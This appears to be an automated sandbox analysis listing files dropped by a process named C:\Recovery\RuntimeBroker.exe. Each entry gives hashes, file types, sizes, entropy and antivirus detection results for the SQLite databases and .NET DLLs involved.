                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):25
                                                                                                            Entropy (8bit):4.293660689688185
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:GUKcmNVIE3ZH3:GHH3
                                                                                                            MD5:8082DB3577BA2847DB9EC3326E3644CF
                                                                                                            SHA1:E8F9440D61B6B4035432083F71B642C3A5932954
                                                                                                            SHA-256:08FEC9B1274EC7468EB6308A8A25D022625AF80D02EC3163F0EA1090CF849D2E
                                                                                                            SHA-512:BEDA4DBE6E1FA530FF87FE6AEBB05E5CA9222D3AB7B30760EB9A3D36BB8651F81582C926CA6F3DF608C427423791D0B2F05685A95F70F25CA3CBC2D4195E16F7
                                                                                                            Malicious:false
                                                                                                            Preview:XBY1olwCh0UC6Ona2JZeYDUUR
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):23552
                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: QMT2731i8k.exe, Detection: malicious
                                                                                                            • Filename: EQdhBjQw4G.exe, Detection: malicious
                                                                                                            • Filename: 3AAyq819Vy.exe, Detection: malicious
                                                                                                            • Filename: TGh6AUbQkh.exe, Detection: malicious
                                                                                                            • Filename: k1iZHyRK6K.exe, Detection: malicious
                                                                                                            • Filename: VfKk5EmvwW.exe, Detection: malicious
                                                                                                            • Filename: cGZV10VyWC.exe, Detection: malicious
                                                                                                            • Filename: PbfYaIvR5B.exe, Detection: malicious
                                                                                                            • Filename: 9D7RwuJrth.exe, Detection: malicious
                                                                                                            • Filename: qZoQEFZUnv.exe, Detection: malicious
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):33792
                                                                                                            Entropy (8bit):5.541771649974822
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):85504
                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):85504
                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
